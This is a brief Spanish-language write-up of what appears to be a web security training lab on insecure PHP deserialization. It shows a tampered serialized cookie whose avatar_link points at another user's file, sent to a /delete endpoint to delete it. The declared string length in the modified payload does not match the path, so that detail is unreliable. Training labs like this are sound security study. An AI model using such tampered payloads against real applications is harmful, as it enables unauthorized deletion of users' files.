Select a result to preview

3 - Using application functionality to exploit insecure deserialization

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:19:"users/wiener/avatar";}

Simplemente hacemos un POST a /delete cambiando la cookie por :

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:19:"/home/carlos/morale.txt";}